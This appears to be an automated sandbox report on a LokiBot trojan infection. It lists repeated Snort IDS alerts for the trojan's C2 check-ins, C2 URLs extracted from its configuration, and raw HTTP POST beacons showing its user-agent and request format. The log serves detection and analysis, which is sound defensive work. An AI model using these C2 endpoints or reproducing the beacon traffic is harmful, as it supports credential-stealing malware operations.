                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49939 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49939 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49939 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49939 -> 172.67.219.104:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewIP Address: 172.67.219.104 172.67.219.104
                Source: Joe Sandbox ViewIP Address: 104.21.62.32 104.21.62.32
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
